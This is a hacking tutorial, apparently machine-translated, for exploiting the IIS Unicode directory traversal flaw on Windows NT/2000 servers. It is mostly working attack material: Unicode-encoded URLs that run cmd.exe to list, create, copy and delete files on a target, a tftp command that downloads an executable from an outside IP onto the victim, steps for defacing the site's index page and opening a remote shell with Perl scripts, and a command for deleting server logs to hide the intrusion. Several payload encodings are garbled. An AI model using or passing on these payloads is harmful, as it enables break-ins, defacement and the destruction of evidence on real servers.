HACKING UNICODE Before everything it is necessary to know if host is using Windows NT or 2000, and the InterNet information server 4,0 or 5,0, these information can be gotten it saw implementation of tecncicas of finger print or banner, or still, scans that they return which operational system and which web server is being used for host white. The next step is to know if the target is vulnerable or not to bug of unicode, to know of this you can use scans of vulnerabilities, as nessus (linux) or twwwscan (windows), in case that bug of unicode esteje present, unicodecheck.pl uses scan that it is I specify for this imperfection to really see to be it is bugado, therefore the times scan of vulns shows the vulnerability but the system already was corrected. Verifying if host it is bugado through the use of scan I specify: Locating the way of root: http://www.host.com/idq.idq "path not found c:\inetpub\wwwroot\idq.idq Executing scan: Perl unicodecheck.pl www.host.com:80 "to dir c:\inetpub\wwwroot" # Sensepost.exe found - Executing [ to dir c:inetpubwwwroot ] on www.host.com:80 # HTTP/1.1 200 OK # Server: Microsoft-IIS/5.0 # Date: Fri, 12 Jan 2001 13:52:52 GMT # Content-Type: they application/octet-stream # Volume in drive C has in label. # Serial Volume Number is 543D-8959 # # Directory of c:inetpubwwwroot # #01/11/2001 05:33p to dir. #01/11/2001 05:33p dir.. #06/03/1999 09:13p 342 aveia.gif #06/03/1999 09:13p 1,736 index.html #01/11/2001 05:33p to dir images #09/22/1999 12:58p 7,240 start.asp #06/03/1999 09:13p 356 manta.gif #06/03/1999 09:13p 2,806 pagao.gif #01/11/2001 05:33p 2,497 post.html #06/03/1999 09:13p 1,046 printing.gif #06/03/1999 09:13p 1,577 war.gif #06/03/1999 09:13p 1,182 woowoo.gif #06/03/1999 09:13p 4,670 zetarock.gif #01/11/2001 05:33p to dir _ private #01/11/2001 05:33p 1,759 _ vti_inf.html #01/11/2001 05:33p to dir _ vti_log # 11 File(s) 25.211 bytes # 5 Dir(s) 1,066,082,304 bytes free Studying the server: You can use browser to visualize directories and archives of the server, former: http://server/scripts/..%c1%c,../winnt/system32/cmd.exe?/c+dir+c: \ http://server/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: \ http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: \ http://server/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: \ http://server/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: \ http://server/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: \ to http://server/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c: \ http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/ cmd.exe?/c+dir+c: \ http://server/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/ cmd.exe?/c+dir+c: \ http://server/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/ cmd.exe?/c+dir+c: \ Note: you can also use the options dir+d: \ dir+e: \ dir+f: \ he stops to visualize excessively hard disk's/partic,oes of the server. directory c: \ it is not listed, however all the others are. Copying archives, creating directories, writing and deletando archives. Creating directories: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe / c+md+c:\Manager_fix_this writing one txt: /C+echo+anything+>c:\etc.txt Copying: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe / c+copy+c:\caca.mdb Deletando: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe / c+del+c:\caca.mdb Visualizing one txt: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/ system32/cmd.exe?/c+type+c:\caca.txt Making uploads: You it will need a serving ftp installed in its computer, in linux can be used tftp. Example: http://www.host.com/scripts/..%c0%af../winnt/system32/cmd.exe/c+tftp.exe+"-i " +200.200.200.200+get+file.exe+c:\destino\file.exe Understanding: tftp - customer of ftp of Windows NT or 2000, that farah download of the archive of its server of ftp. "- i" - it indicates that the archive that serah sent to the server eh binary, when an archive of simple text (txt) will be sent, a this parameter can be eliminated. 200.200.200.200 - address IP of the ftp server where the archive to be sent for host estah stored. get - it indicates that the archive must be gotten of specified address IP. file.exe - name of the to be sent archive. c:\destino - directory of the server for where the archive serah sent. file.exe - name that the archive ganharah in the server. Disfiguring: Perl unicodexecute2.pl www.host.com:80 cmd/echo web site defaced > c:inetpub\wwwroot\index.html Getting access shell: Perl unicode_shell.pl www.host.com:80 Deletando log's http://host.com/cgi-bin/cmd.exe?/c+del+c:/winnt/system32/logfiles/in010323.log